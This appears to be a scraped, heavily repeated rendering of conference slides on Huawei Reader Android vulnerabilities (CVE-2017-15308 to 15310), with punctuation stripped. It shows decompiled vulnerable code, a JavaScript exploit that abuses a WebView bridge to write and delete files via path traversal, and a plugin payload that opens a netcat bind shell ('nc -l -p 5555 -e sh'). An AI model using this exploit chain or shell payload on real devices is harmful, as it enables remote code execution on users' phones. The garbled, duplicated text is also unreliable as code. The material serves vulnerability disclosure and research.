Page 39: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 40: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 41: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 42: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 43: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 44: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 45: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 46: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 47: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 48: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

